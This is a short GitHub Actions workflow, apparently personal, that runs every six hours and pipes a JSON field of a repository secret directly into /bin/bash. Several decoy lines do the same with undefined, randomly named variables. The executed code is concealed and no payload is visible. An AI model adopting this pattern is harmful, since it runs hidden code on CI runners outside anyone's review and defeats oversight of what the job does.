name: yaobeicihua
on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yaobeicihua
        env:
          j40745: ${{ secrets.j40745 }}
        run: |
          echo $j40745 | jq -r .i4 | /bin/bash
          echo $ak24710 | jq -r .qwwf01757 | /bin/bash
          echo $zvf5 | jq -r .j255 | /bin/bash
          echo $qd2341 | jq -r .j7783 | /bin/bash
          echo $r85 | jq -r .tuxx93925 | /bin/bash
          echo $z1515 | jq -r .evjpe576 | /bin/bash
          echo $smn98855 | jq -r .mav49330 | /bin/bash
          echo $pok3 | jq -r .uvf8550 | /bin/bash
          echo $deqb408 | jq -r .gqfc34 | /bin/bash

